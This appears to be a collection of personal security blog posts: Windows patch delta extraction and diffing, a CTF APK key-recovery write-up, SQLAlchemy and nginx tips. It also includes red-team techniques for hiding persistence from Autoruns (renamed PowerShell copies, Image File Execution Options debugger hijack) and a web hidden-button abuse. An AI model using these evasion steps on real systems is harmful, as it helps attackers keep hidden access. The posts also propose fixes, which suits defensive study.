The MSIL, WOW64, x86, and x64 folders will contain all of the different platform folders with their prefixes removed. The PATCH folder will contain the patch MSU and its contents, except for the patch PSFX metadata text file, which is left in the root of the top level folder. Finally, the JUNK folder is populated with the .manifest files and also the .mum and .cat files we don't really care about. Use this tool to speed up the patch extraction process!

Handling Extracted Patches

A word of caution when extracting patches: always do it on your local machine, zip up the results, and then transfer to another machine for storage. An uncompressed, extracted patch is about 1.5 GB and a compressed, extracted patch is about 1 GB. This can fill up your disk space fast! Since there are tens of thousands of files in each patch, a transfer of the uncompressed directory structure will take a very long time. If you need to search through a compressed patch you can just use unzip -l to list the contents and then extract only the files you need.
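If you prefer to stay in python instead of shelling out to unzip, the same "list first, extract only what you need" workflow can be sketched with the standard zipfile module. The helper names and the glob patterns below are hypothetical, and the sketch assumes the patch was compressed as a regular .zip archive.

```python
import fnmatch
import zipfile


def find_members(archive, pattern):
    """List member names in a zip that match a glob pattern, ignoring case.

    archive can be a path or a seekable file-like object.
    """
    with zipfile.ZipFile(archive) as zf:
        return [name for name in zf.namelist()
                if fnmatch.fnmatch(name.lower(), pattern.lower())]


def extract_members(archive, pattern, dest):
    """Extract only the members matching pattern into dest; return their names."""
    with zipfile.ZipFile(archive) as zf:
        wanted = [name for name in zf.namelist()
                  if fnmatch.fnmatch(name.lower(), pattern.lower())]
        zf.extractall(dest, members=wanted)
    return wanted
```

Something like find_members("2020-08.zip", "*os-kernel*/f/ntoskrnl.exe") would then list the forward differential for the kernel without unpacking the other tens of thousands of files.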

Types of Patch Files

Full Files

Platform folders without an n, f, or r directory in them contain the full file to be installed. The patch process is as simple as copying the file(s) in that folder to the place(s) specified in the corresponding .manifest file.

How would you get ahold of another copy of this file to diff against? This can be difficult, but you may be able to look in previous patches for a different version. It turns out that differentials are actually the more convenient case here!

Patch Deltas

When a platform folder has an n, f, or r directory in it the patch is a delta that is either applied to the existing file (r/f) or to an empty buffer to create a new file (n). Microsoft published a whitepaper on differentials at the beginning of this year (2020). It contains some details about the technology, but not enough to be useful in manually applying the deltas, other than knowing what f, r, and n mean.

Types of Deltas

As mentioned previously, there are three types of deltas:

  • Forward differentials (f) - brings the base binary (.1) up to that particular patch level
  • Reverse differentials (r) - reverts the applied patch back to the base binary (.1)
  • Null differentials (n) - a completely new file, just compressed; apply to an empty buffer to get the full file

You will always see r and f folders together inside of a patch because you need to be able to revert the patch later on to apply a newer update.
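To make the distinction concrete, here is a small sketch that looks at a platform folder and reports which kind of patch content it holds. The function name and return values are my own; it only encodes the rule described above (n, f, or r subdirectories mean deltas, none of them means full files).

```python
from pathlib import Path

# Subdirectory name -> kind of differential, as described above.
DELTA_DIRS = {"f": "forward", "r": "reverse", "n": "null"}


def classify_platform_folder(folder):
    """Return the delta kinds found in a platform folder, or ['full'] if none."""
    folder = Path(folder)
    kinds = [kind for name, kind in DELTA_DIRS.items()
             if (folder / name).is_dir()]
    return kinds or ["full"]
```

Running this over every platform folder in an extracted patch is a quick way to see which components ship as full files and which ship as differentials.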

Delta APIs

Before I start diving into the format of deltas and applying them to files, it is worth noting that Microsoft provides (slightly outdated, but still relevant) developer documentation on the Delta Compression APIs. There are actually two completely different APIs for creating and applying patch deltas: PatchAPI and MSDELTA. For this post I will be focusing on the MSDELTA API since it is newer and solely used in new patches that are being published. Besides, if you call into the MSDELTA API and provide a PatchAPI patch file it will recognize that and apply the patch anyway by calling into mspatcha.dll.

Functions in the MSDELTA API are contained inside of msdelta.dll.

  • CreateDelta(A|W|B) - create a delta from a file (A|W) or buffer (B)
  • ApplyDelta(A|W|B) - apply a delta from a file to a file (A|W) or from a buffer (B) to a buffer (B)
  • ApplyDeltaProvidedB - apply a delta from a buffer to a provided buffer that is caller allocated (no need to call DeltaFree)
  • GetDeltaInfo(A|W|B) - get metadata about the patch and calculate the signature of a delta file (A|W) or buffer (B)
  • GetDeltaSignature(A|W|B) - calculate the signature of a delta file (A|W) or buffer (B).
  • DeltaNormalizeProvidedB - puts a delta buffer in a standard state in order to be hashed by an algorithm not supported by MSDELTA
  • DeltaFree - free a delta buffer created by CreateDeltaB or ApplyDeltaB

I'll be using ApplyDeltaB to apply multiple patch delta files to a file buffer and then DeltaFree to free the generated buffer(s). Looking more closely at GetDeltaInfo* and DeltaNormalizeProvidedB is on my TODO list, but isn't all that important for the purposes of this post.

Another interesting feature of the MSDELTA API is the ability to apply the delta to specific binary sections via file type sets. There's more research to be done behind those as well!

Delta Formats

At first glance, you'd be convinced that the files in the delta folders inside of the patch are the full binaries because of their extensions. The first clue that they are not is the size of them, as they are considerably smaller than you'd expect a full binary to be. The other is that the file format is something completely different! Opening up a few of the extracted files in a hex editor shows this quickly:

wumb0 in patches$ xxd 2020-08/patch/amd64_microsoft-windows-os-kernel_31bf3856ad364e35_10.0.18362.1016_none_79ea293316ee3bad/f/ntoskrnl.exe | head
00000000: e45a 9bd5 5041 3330 6e2b 8720 fa6a d601  .Z..PA30n+. .j..
00000010: b05e 10d0 c7c4 0cc4 69bc c401 4021 00b4  .^......i...@!..
00000020: ab4f 2159 0f6a 2ab4 7848 f5df d9cd 2fb8  .O!Y.j*.xH..../.
00000030: b30b 0400 0000 0a00 0000 0000 0000 9836  ...............6
00000040: 86a9 cb02 f05b dddd dddd dddd dddd dddd  .....[..........
00000050: dd2d 4dd2 333d d143 3dd4 ddd3 0128 c6c4  .-M.3=.C=....(..
00000060: cccc cccc cccc cccc c31c 22c2 cccc 3c2c  .........."...<,
00000030: 003c 12                                  .<.>

These are not PE or PNG files, and one clear pattern emerges: PA30 appears at offset 4 in every file, no matter what the type is. But what are those first four bytes? In my initial attempts at working with deltas I was getting frustrated because using any of the ApplyDelta* functions from msdelta.dll resulted in errors. Research on the file format (PA30) eventually led me to the patent for the technology, which is interesting if you want to take a look, but provided no answer to my issue. In a true FILDI moment I just cut off the first four bytes, since file magic is usually at the start of the file (right?), and to my surprise the delta applied! Excellent, so what are those 4 bytes? And is that format documented anywhere? After a bit of thinking about seemingly useless bytes on files I'd encountered before, a checksum came to mind, specifically the most common 4 byte checksum I could think of: CRC32! So I hopped into ipython to try it out:


In [1]: import zlib

In [2]: data = open("2020-08/patch/amd64_microsoft-windows-f..ysafety-refreshtask_31bf3856ad364e35_10.0.18362.997_none_
   ...: b453df19f80f8d5b/f/wpcmon.png", "rb").read()

In [3]: hex(zlib.crc32(data[4:]))
Out[3]: '0x1a0a0b40'

In [4]: hex(int.from_bytes(data[:4], 'little'))
Out[4]: '0x1a0a0b40'

My suspicion was confirmed! Totally a lucky guess and it isn't documented anywhere that I can find.
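The same check can be wrapped up as a reusable helper that validates the prefix and hands back the bytes msdelta.dll actually wants. This is a sketch based only on the observations above (a little-endian CRC32 of everything after the first four bytes, followed by the PA30 magic); the function name is my own, and I have not checked whether legacy PA19 files carry the same prefix.

```python
import zlib


def strip_crc_header(delta_file_bytes):
    """Verify the 4-byte CRC32 prefix and return the raw PA30 delta after it."""
    if len(delta_file_bytes) < 8:
        raise ValueError("too short to hold a CRC32 prefix and a PA30 magic")
    stored_crc = int.from_bytes(delta_file_bytes[:4], "little")
    payload = delta_file_bytes[4:]
    if zlib.crc32(payload) != stored_crc:
        raise ValueError("CRC32 prefix does not match the delta contents")
    if not payload.startswith(b"PA30"):
        raise ValueError("missing PA30 magic after the CRC32 prefix")
    return payload
```

Failing loudly on a mismatch is deliberate: a file that does not follow this layout is probably a full file rather than a delta, and should not be fed to ApplyDeltaB.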

After going through this discovery, I thought it would make an interesting CTF challenge, so I designed one for the yearly RITSEC CTF. It was supposed to be called patch-tuesday but I accidentally uploaded the original .sys file with the flag in it. The challenge ended up being called patch-2sday and involved invoking the MSDELTA API to patch a file after stripping off a prepended CRC32. Greetz to layle and yuana for being the only two to solve it! You can find a write-up of the solution to the challenge on the RITSEC GitHub; the repo also has the script I used to create the delta, if you are interested in that.

Generating Useful Binaries Out of Deltas

Let's say that I have a Windows 10 1903 x64 machine and I want to look at the differences between ntoskrnl.exe from July to August 2020. The machine has the October 2019 patches installed currently. I am going to copy the ntoskrnl.exe binary out of C:\windows\system32 and use the MSDELTA API to apply deltas to the binary to get the versions I want.

Reverse, then Forward

The version of the kernel binary that I have is 10.0.18362.388. I will need the reverse differential for this particular version to roll it back to version 10.0.18362.1 before I start patching up. I could download and extract the October 2019 update, but that would take a long time. Recall that when patches are installed, Windows Update will place binaries and differentials in the C:\Windows\WinSxS directory. You can run some PowerShell to find the delta you need already on the system:

PS > Get-ChildItem -Recurse C:\windows\WinSxS\ | ? {$_.Name -eq "ntoskrnl.exe"}
    Directory:
    C:\windows\WinSxS\amd64_microsoft-windows-os-kernel_31bf3856ad364e35_10.0.18362.388_none_c1e023dc45da9936

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a---l        10/4/2019   6:06 AM        9928720 ntoskrnl.exe


    Directory:
    C:\windows\WinSxS\amd64_microsoft-windows-os-kernel_31bf3856ad364e35_10.0.18362.388_none_c1e023dc45da9936\f


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/30/2019   6:39 PM         479646 ntoskrnl.exe


    Directory:
    C:\windows\WinSxS\amd64_microsoft-windows-os-kernel_31bf3856ad364e35_10.0.18362.388_none_c1e023dc45da9936\r


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/30/2019   6:39 PM         476929 ntoskrnl.exe

The full version as well as both the forward and reverse differentials are present. Now I have all of the files I need to perform the deltas and get the two versions of the kernel that I want to diff!
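When there are several candidate folders, it helps to pull the version out of the folder name so you can match it against the binary you have. Below is a sketch that assumes the arch_name_publicKeyToken_version_culture_hash layout seen in the listings in this post; the class and function names are hypothetical.

```python
from typing import NamedTuple, Tuple


class PlatformFolder(NamedTuple):
    arch: str
    name: str
    public_key_token: str
    version: Tuple[int, ...]
    culture: str
    suffix: str


def parse_platform_folder(folder_name):
    """Split a WinSxS-style platform folder name into its components.

    Raises ValueError if the name does not have the expected six fields.
    """
    arch, rest = folder_name.split("_", 1)
    # Split from the right so a (possibly truncated) component name stays whole.
    name, token, version, culture, suffix = rest.rsplit("_", 4)
    return PlatformFolder(arch, name, token,
                          tuple(int(part) for part in version.split(".")),
                          culture, suffix)
```

Storing the version as a tuple of integers means versions compare numerically, so (10, 0, 18362, 388) sorts before (10, 0, 18362, 1016), which a plain string comparison would get wrong.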

Applying a Patch Delta with the MSDELTA API

I decided to write a python program to interact with msdelta.dll and invoke the ApplyDelta family of functions. If you have never used python ctypes before then the script might seem a little strange at first, but I promise it is a very powerful tool to have in your utility belt. Among other things, ctypes can act as a Foreign Function Interface to C; it allows you to call functions inside of DLLs, create structures and unions, raw buffers, and has a number of primitive types implemented such as c_uint64, c_char_p, and Windows types like DWORD, HANDLE, and LPVOID.
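To give a feel for what that looks like, here is a stripped-down sketch of ctypes bindings for ApplyDeltaB and DeltaFree. It is an illustration rather than the script itself: the structure layouts follow the DELTA_INPUT and DELTA_OUTPUT definitions in Microsoft's MSDELTA documentation, the helper names (make_input, apply_deltas) are my own, and the deltas are assumed to have had their CRC32 prefix removed already.

```python
import ctypes
import sys


class DELTA_INPUT(ctypes.Structure):
    # lpcStart/lpStart are a union in the C header; one pointer field covers both.
    _fields_ = [
        ("lpStart", ctypes.c_void_p),
        ("uSize", ctypes.c_size_t),
        ("Editable", ctypes.c_int),  # BOOL
    ]


class DELTA_OUTPUT(ctypes.Structure):
    _fields_ = [
        ("lpStart", ctypes.c_void_p),
        ("uSize", ctypes.c_size_t),
    ]


DELTA_FLAG_NONE = 0
DELTA_APPLY_FLAG_ALLOW_PA19 = 1  # allow legacy PatchAPI deltas


def make_input(data):
    """Wrap bytes in a DELTA_INPUT. Also returns the backing buffer so the
    caller can keep it alive for as long as the structure is in use."""
    if not data:
        return DELTA_INPUT(None, 0, False), None  # empty source for null diffs
    buf = ctypes.create_string_buffer(data, len(data))
    return DELTA_INPUT(ctypes.addressof(buf), len(data), False), buf


def apply_deltas(source, deltas, allow_legacy=False):
    """Apply each delta to the running result, in order. Windows only."""
    if sys.platform != "win32":
        raise OSError("msdelta.dll is only available on Windows")
    msdelta = ctypes.WinDLL("msdelta.dll", use_last_error=True)
    msdelta.ApplyDeltaB.argtypes = [ctypes.c_int64, DELTA_INPUT, DELTA_INPUT,
                                    ctypes.POINTER(DELTA_OUTPUT)]
    msdelta.ApplyDeltaB.restype = ctypes.c_int
    msdelta.DeltaFree.argtypes = [ctypes.c_void_p]
    msdelta.DeltaFree.restype = ctypes.c_int

    flags = DELTA_APPLY_FLAG_ALLOW_PA19 if allow_legacy else DELTA_FLAG_NONE
    current = source
    for delta in deltas:
        src, src_buf = make_input(current)   # buffers stay referenced here
        dlt, dlt_buf = make_input(delta)
        out = DELTA_OUTPUT()
        if not msdelta.ApplyDeltaB(flags, src, dlt, ctypes.byref(out)):
            raise ctypes.WinError(ctypes.get_last_error())
        try:
            current = ctypes.string_at(out.lpStart, out.uSize)
        finally:
            msdelta.DeltaFree(out.lpStart)   # output buffer is owned by msdelta
    return current
```

With this shape, rolling a binary back and then forward is a single call along the lines of apply_deltas(base_bytes, [reverse_delta, forward_delta]), and a null differential is applied by passing b"" as the source.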

If you're interested in more uses of ctypes check out my post on making efficient use of ctypes structures, though keep in mind that it is written for python 2.7 and some things may have to change from the examples to support python 3. I'd like to do an addendum post sometime that ports the code to python 3.

Below is the final patch delta applying script written for python 3 (click the filename to expand). It uses all python builtins, and you'll need to be on a Windows system to run it, as it imports msdelta.dll and uses ApplyDeltaB to apply patches. It even supports legacy PatchAPI patches (PA19).

delta_patch.py

Here's a printout of the program's usage, so you can get a feel for what it provides and how to use it.

PS > python X:\Patches\tools\delta_patch.py -h
usage: delta_patch.py [-h] (-i INPUT_FILE | -n) (-o OUTPUT_FILE | -d) [-l] patches [patches ...]

positional arguments:
  patches               Patches to apply

optional arguments:
  -h, --help            show this help message and exit
  -i INPUT_FILE, --input-file INPUT_FILE
                        File to patch (forward or reverse)
  -n, --null            Create the output file from a null diff (null diff must be the first one specified)
  -o OUTPUT_FILE, --output-file OUTPUT_FILE
                        Destination to write patched file to
  -d, --dry-run         Don't write patch, just see if it would patchcorrectly and get the resulting hash
  -l, --legacy          Let the API use the PA19 legacy API (if required)

To generate the binaries I want I'm going to apply the reverse delta and then each forward delta, creating two output files:

PS > python X:\Patches\tools\delta_patch.py -i ntoskrnl.exe -o ntoskrnl.2020-07.exe .\r\ntoskrnl.exe X:\Patches\x64\1903\2020\2020-07\x64\os-kernel_10.0.18362.959\f\ntoskrnl.exe
Applied 2 patches successfully
Final hash: zZC/JZ+y5ZLrqTvhRVNf1/79C4ZYwXgmZ+DZBMoq8ek=
PS > python X:\Patches\tools\delta_patch.py -i ntoskrnl.exe -o ntoskrnl.2020-08.exe .\r\ntoskrnl.exe X:\Patches\x64\1903\2020\2020-08\x64\os-kernel_10.0.18362.1016\f\ntoskrnl.exe
Applied 2 patches successfully
Final hash: UZw7bE231NL2R0S4yBNT1nmDW8PQ83u9rjp91AiCrUQ=

The patches applied successfully and now I have two full binaries, one from August 2020's patchset and another from July 2020. The hashes that are generated should match up with the ones in the corresponding manifest files!
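If you want to double check a generated binary yourself, the comparison is short. This sketch assumes the digest is a base64-encoded SHA-256 of the whole file, which is what the DigestMethod in the manifests suggests; the function names are hypothetical.

```python
import base64
import hashlib


def manifest_style_digest(data):
    """Base64-encoded SHA-256 of data, in the same shape as a manifest DigestValue."""
    return base64.b64encode(hashlib.sha256(data).digest()).decode("ascii")


def matches_manifest(data, digest_value):
    """True if data hashes to the DigestValue string taken from a manifest."""
    return manifest_style_digest(data) == digest_value.strip()
```

A mismatch usually means the wrong reverse differential was used or the deltas were applied in the wrong order.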

What About Null Diffs?

Before I move on to diffing the two kernel versions, I wanted to explain how to use the delta_patch tool to generate a full file out of a null (n) differential. There is a built in option for it! Use the -n flag and specify an output file (but no input file) and delta_patch will apply the delta to an empty buffer. The result is the full file!

For example:

PS > python X:\Patches\tools\delta_patch.py -n -o vmcomputeagent.exe  2020-08\patch\amd64_hyperv-compute-guestcomputeservice_31bf3856ad364e35_10.0.18362.329_none_e3769ae1a46d95f1\n\vmcomputeagent.exe
Applied 1 patch successfully
Final hash: B5mZQ8i4OU22UQXOaDhLHNtLNhos6exfTHlsPzTmXGo=
PS > wsl -e file vmcomputeagent.exe
vmcomputeagent.exe: PE32+ executable (GUI) x86-64, for MS Windows

As you can see from the output of file, the null differential has been expanded into a full executable. You can also apply a forward differential, but only after the null one, of course, otherwise you wouldn't have a file to patch!

Patch Diffing

There are plenty of resources available on binary diffing and comparing diffing tools, so I won't be diving into how to use them, but for completeness' sake, I'm going to diff the two kernels I just created!

I am going to open both versions of ntoskrnl.exe in IDA Pro 7.5, accept the symbol download prompt, and let the auto-analysis finish. Then, I'm going to close the newer of the two versions (2020-08) and call up BinDiff to diff the new version (secondary) against the older one (primary).

Matched Functions
There are only a few changed functions between the two versions

I'm going to look at MmDuplicateMemory because changes in functions related to memory always catch my eye! Below is an overview of the combined call graph in BinDiff. Green blocks are unchanged, yellow blocks have differences, red blocks were removed by the patch, and gray blocks were added by the patch.

Overview graph
Graph overview with BinDiff in combined mode

There are many changes, but I wanted to highlight one block in particular right near the top of the function (indicated by the red arrow):

Changed block
Can you spot the important change?

It looks like the return value from the function KeWaitForSingleObject was not checked in the unpatched version and the patch added a check to make sure that the function returns a value of 0 (WAIT_OBJECT_0). In terms of judging the severity of this bug, more work needs to be done to investigate what waitable object is being passed to KeWaitForSingleObject (cs:[0x1404681D0]), if there is any way to get the wait to fail reliably, and what behavior that failure would cause. This is an exercise left up to the reader.

Wrap Up

Thanks for sticking around to the end. I hope you learned a thing or two. If you have questions, comments, concerns, complaints, or corrections please feel free to reach out to me. I'm on twitter at @jgeigerm. Also reach out if the scripts break, they shouldn't do that. I'm going to try and post more Windows related content in the future, so stay tuned. I hope to see you in SEC760 someday! I recently re-wrote the kernel exploitation day and it's been a blast to teach!

That's all for now, ~~have fun inside~~!

Autoruns Bypasses

Autoruns is a tool that is part of the Microsoft Sysinternals suite. It comes in permutations of console/GUI and 32/64 bit versions. Its main purpose is to detect programs, scripts, and other items that run either periodically or at login. It's a fantastic tool for blue teams to find persistent execution, but it is not perfect! By default, autoruns hides entries that are considered "Windows" entries (Options menu -> Hide Windows Entries). There is a checkbox to unhide them, but it introduces a lot of noise. In my preparations to red team for the Information Security Talent Search (ISTS) at RIT and the Mid-Atlantic Collegiate Cyber Defense Competition (MACCDC) this year I found a few ways to hide myself among the Windows entries reported in Autoruns.

For some prior work done in this area check out Huntress Labs's research and Conscious Hacker's research.

[[more]]

Method 1: Copy a file

This one is as easy as copying powershell or cmd to another name and using that name instead. It looks like autoruns will flag by name on powershell and cmd as shown below:

malicious entry found in autoruns

This entry in the infamous run key is running powershell to use Net.Webclient to download and execute a string (DownloadString -> IEX).
badstuff registry entry

Clearly malicious! So now let's try copying powershell.exe to badstuff.exe:
copy \Windows\system32\WindowsPowerShell\v1.0\powershell.exe \Windows\system32\badstuff.exe

Then we need to edit the registry key to use our copied executable:

regedit copy

Now, looking at autoruns, it appears clean:
clean autoruns

Showing windows entries reveals the entry, but this time it is not highlighted red. Autoruns doesn't know what it is, only that it is in system32 and signed by Microsoft.
autoruns with windows entries

Proposed fix: check not only the executable name, but the program description to detect cmd and powershell.
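On the defensive side, a related check that is easy to sketch is comparing file contents rather than names. Note that this is a different technique from the description check proposed above (I'm swapping it in because it needs nothing beyond hashing): it flags files that are byte-for-byte copies of a known interpreter but live under another name. The function names are hypothetical.

```python
import hashlib
from pathlib import Path


def sha256_of(path):
    """Hex SHA-256 of a file's contents."""
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def find_renamed_copies(known_interpreters, candidates):
    """Map each candidate that is an exact copy of a known interpreter,
    but has a different file name, to the interpreter it was copied from."""
    known = {sha256_of(p): Path(p) for p in known_interpreters}
    hits = {}
    for cand in map(Path, candidates):
        original = known.get(sha256_of(cand))
        if original is not None and cand.name.lower() != original.name.lower():
            hits[cand] = original
    return hits
```

Feeding it powershell.exe and cmd.exe as the known interpreters and the executables referenced by autorun entries as candidates would catch the badstuff.exe copy from this method, though not a modified or differently-versioned binary.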

Method 2: Image File Execution Options

The Image File Execution Options (IFEO) registry key located at HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options is used to set a myriad of options such as heap options and setting a program's debugger. For this bypass to work we can pick a lesser-used executable in System32 and set its Debugger in IFEO to cmd.exe or powershell.exe. I chose print.exe for this test, but there may be better options.

print ifeo

The technique involves creating a key named after the target executable (print.exe here) under the parent IFEO key and adding a REG_SZ value named Debugger that holds the executable to run instead.
Then we need to edit our run key to use print.exe instead of powershell.exe. Checking back with autoruns the entry is gone!
clean autoruns

And again unhiding windows entries results in the entry being shown, but this time we have the added bonus of not appearing as powershell in the description!
autoruns with windows entries print

Proposed fix: resolve the final executable by checking the Debugger key in Image File Execution Options.
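Here is a rough sketch of what that resolution step could look like. The function names are my own, the command parsing is deliberately naive (it does not handle quoted paths that contain spaces), and it relies on the documented behavior that Windows launches the Debugger value with the original command line appended.

```python
import ntpath

IFEO_PATH = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"


def load_ifeo_debuggers():
    """Windows only: map lowercase image name -> Debugger string."""
    import winreg  # imported here so the rest of the sketch loads anywhere
    debuggers = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, IFEO_PATH) as ifeo:
        subkey_count = winreg.QueryInfoKey(ifeo)[0]
        for index in range(subkey_count):
            image = winreg.EnumKey(ifeo, index)
            with winreg.OpenKey(ifeo, image) as sub:
                try:
                    value, _value_type = winreg.QueryValueEx(sub, "Debugger")
                except FileNotFoundError:
                    continue  # no Debugger value set for this image
            debuggers[image.lower()] = value
    return debuggers


def resolve_command(command, debuggers):
    """Return the command line that would really run once IFEO is applied."""
    parts = command.strip().split(None, 1)  # naive split on first whitespace
    if not parts:
        return command
    image = ntpath.basename(parts[0].strip('"')).lower()
    debugger = debuggers.get(image)
    if debugger is None:
        return command
    return f"{debugger} {command}"
```

With the print.exe key from this method in place, resolve_command on the run key entry would come back starting with cmd.exe or powershell.exe, which is exactly what the name-based check should then be looking at.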

There's another technique you can also use with IFEO documented on Oddvar Moe's blog.

Wrap-up

A tool is really only as good as the algorithms it uses. Autoruns is no exception. It doesn't go deep enough to figure out what binary is actually executing or if that binary is something that it would normally flag with its original name. Always be skeptical of your tools and know they might not be perfect!

Uberconference Hidden Hangup Button

I was on an uberconference call the other day and the leader of the conference mentioned how they had the ability to disconnect anyone on the call with a "Hangup" button next to the mute and profile buttons. Looking at the interface a caller with the icons expanded looks like this:

caller interface

Now let's inspect... Going down to where the profile and mute buttons are located it looks like there's one more, hidden button available:

hangup hidden html

Removing the style="display: none;" attribute from the div causes the button to show...

hangup enabled

It's funny because it actually works. If you click it the person gets booted from the call, even if you aren't an admin/call leader. Web is hard.
Thanks for reading.

Hack Fortress 2019 - helloworld2.apk

Final Score

Another great year of Hack Fortress at Shmoocon!
I wanted to do a post on this challenge in particular because it was one of two 300 point challenges on the board. I always get inside my own head about these challenges but I remind myself: they are not normal CTF challenges. These challenges are meant to be solved in just a few minutes, since the board is pretty big and the length of the competition is pretty short (30 min for prelims, 45 min for finals).

I always focus on the Data Exploitation challenges because they usually have high point values and consist of android application reversing, basic binary reversing, macOS and image forensics (thanks Sarah), obscure encoding, crypto (sometimes), and hardware, among other things. It's a very diverse but fun category. I solved three challenges totalling 525 points in this category in the finals. This particular challenge was the majority of those points, but actually took the least time since I've had experience with android application reverse engineering before.

The challenge details were:

Name: HelloWorld2
Location: helloworld2.apk
Points: 300
Desc: Find the encryption key

Whenever I get an APK I do two things:

Unfortunately my version of dex2jar was out of date so I had some issues with my automated decompilation tools. I ended up downloading the newest version of dextools, running dex2jar, loading the jar into JD-GUI, and exporting the sources.
Android apps always start with MainActivity, which was in the class path fortress/hack/helloworld2. The decompiled code is below.

package fortress.hack.helloworld2;

import android.os.Bundle;
import android.support.v7.app.AppCompatActivity;
import android.util.Base64;
import android.view.View;
import android.widget.EditText;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class MainActivity
  extends AppCompatActivity
{
  static
  {
    System.loadLibrary("native-lib");
  }

  public static String encrypt(String paramString1, String paramString2, String paramString3)
  {
    try
    {
      IvParameterSpec localIvParameterSpec = new javax/crypto/spec/IvParameterSpec;
      localIvParameterSpec.<init>(paramString2.getBytes("UTF-8"));
      paramString2 = new javax/crypto/spec/SecretKeySpec;
      paramString2.<init>(paramString1.getBytes("UTF-8"), "AES");
      paramString1 = Cipher.getInstance("AES/CBC/PKCS5PADDING");
      paramString1.init(1, paramString2, localIvParameterSpec);
      paramString1 = Base64.encodeToString(paramString1.doFinal(paramString3.getBytes()), 0);
      return paramString1;
    }
    catch (Exception paramString1)
    {
      paramString1.printStackTrace();
    }
    return null;
  }

  public void enceyptData(View paramView)
  {
    paramView = (EditText)findViewById(2131165238);
    ((EditText)findViewById(2131165239)).setText(encrypt(keyFromJNI(), getString(2131427370), paramView.getText().toString()));
  }

  public native String keyFromJNI();

  protected void onCreate(Bundle paramBundle)
  {
    super.onCreate(paramBundle);
    setContentView(2131296284);
  }
}

We are looking for the encryption key. In the encrypt function the first parameter passed is the key. We know this because the first parameter to the constructor of javax.crypto.spec.SecretKeySpec is the key as bytes. Encrypt is called from MainActivity.enceyptData (sic) and the first parameter is keyFromJNI(). The function keyFromJNI has the prototype public native String keyFromJNI(); which means that there is a native library in the application that will provide the key back to the Java app.
Native libraries for an android application can be found in the lib directory of the APK. The unpacked apk shows four different architectures in the lib directory: arm64-v8a, armeabi-v7a, x86, and x86_64. I chose to look at the x86 version of libnative-lib.so, since Hopper is better at x86 than other architectures (in my opinion).
Since I have reverse engineered java native libraries before I know to look for the function name and/or class name in the function list. Pictured below is both the search and the decompiled function.

Hopper

Looks like the classic "build a string as integers" trick. I'm assuming sub_61a0 is some kind of memory allocation function, and arg0 is always the JNIEnv pointer, which contains a bunch of useful functions to convert C types into java types to return. I'm guessing the arg0+0x29c is either NewString or NewStringUTF. Moving forward I just took all of the hex bytes from the four integers that get put into the key buffer and unhexlified them.

In [26]: from binascii import unhexlify as unhex

In [27]: unhex("212b2b636f74746f47756f596563694e")
Out[27]: b'!++cottoGuoYeciN'

Looks promising, but backwards...

In [28]: unhex("212b2b636f74746f47756f596563694e")[::-1]
Out[28]: b'NiceYouGottoc++!'

And there's the flag!
NiceYouGottoc++
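
Reversing the whole byte string works because each integer is stored little-endian. As a minimal sketch of the same idea, assuming the four constants land in the key buffer in the order shown here (the order is my assumption, not something taken from the Hopper output), packing them as little-endian 32-bit values gives the key directly:

```python
import struct

# Assumed order of the four 32-bit constants as they are written into the key buffer.
# The values are the same hex bytes used above, regrouped into dwords.
dwords = [0x6563694E, 0x47756F59, 0x6F74746F, 0x212B2B63]

# "<4I" = four little-endian unsigned 32-bit integers, i.e. x86 memory layout
key = struct.pack("<4I", *dwords)
print(key)
```

Each dword comes out byte-swapped ("Nice", "YouG", "otto", "c++!"), which is why the raw hex read backwards.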

sqlalchemy Magic

I was writing a plugin for CTFd and I was faced with an interesting problem: how the hell do I add a column (attribute) to a parent table without modifying that table (or model object)???
I was trying to assign an extra attribute to the Teams model; a one-to-many relationship between bracket and team so I could have Teams.chal_bracket and Bracket.teams, but again without modifying the Teams model.
I had actually tried overriding the Teams model and also adding a row on the fly, but neither of those worked. I ended up with the solution below: [[more]]

# secondary table for team<->bracket associations
tb = db.Table("team_bracket",
              db.Column("bracket_id", db.Integer, db.ForeignKey("bracket.id")),
              db.Column("team_id", db.Integer, db.ForeignKey("teams.id"))
              )


class Bracket(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String, index=True, unique=True)
    hidden = db.Column(db.Boolean)
    # super hacked up way to get the chal_bracket attribute on the parent
    # model class (Teams) without actually modifying it
    teams = db.relationship("Teams", backref=db.backref("chal_bracket", uselist=False),
                            secondary=tb, primaryjoin=id == tb.c.bracket_id,
                            secondaryjoin=Teams.id == tb.c.team_id)

Breaking this down:

  • The table tb defines the table team_bracket, which associates a team and a bracket by id
  • The Bracket class represents a database table and has an attribute teams
  • The teams attribute has a backref that allows access to the bracket of a team using the Teams.chal_bracket attribute. The attribute is back-populated by sqlalchemy internally; this means the table isn't changed, but sqlalchemy does the work for you! The uselist=False argument is used so that team.chal_bracket returns just the bracket object and not a list of length 1 with the bracket object in it.
  • The teams attribute also defines two joins: a primaryjoin that links the id of the object to the bracket id and a secondaryjoin that links the team id to the team_id of the object. This makes it so that you can get all of the teams associated with a bracket by just doing Bracket.teams and also get the bracket associated with a team by doing Teams.chal_bracket.

Normally you would have to define a relationship in the parent as follows:

class Teams(db.Model):
...
    chal_bracket_id = db.Column(db.Integer, db.ForeignKey("bracket.id"))
    chal_bracket = db.relationship("Bracket")

But because of this hack you don't need to modify the parent model to accomplish the exact same thing.
Pretty cool.

Server Side Google Analytics

I stitched together a bunch of posts from different sites to get a working setup for server-side google analytics with unique user tracking. This allows you to have a completely static (javascript-free) site and still get useful analytics data.

server {
    # all of your other config...
        userid         on;
        userid_name    uid;
        userid_domain  <<the domain you are using this on>>;
        userid_path    /;
        userid_expires 365d;
        userid_p3p     'policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"';

        location / {
                try_files $uri $uri/;
                index index.html;
                post_action @analytics;
        }

        location @analytics {
                internal;
                set $ipaddr $remote_addr;
                resolver 8.8.8.8 ipv6=off;
                proxy_pass https://ssl.google-analytics.com/collect?v=1&tid=<<your analytics UA- tag>>&cid=$uid_got&t=pageview&dh=$host&dp=$uri&dr=$http_referer&uip=$remote_addr;
        }
}

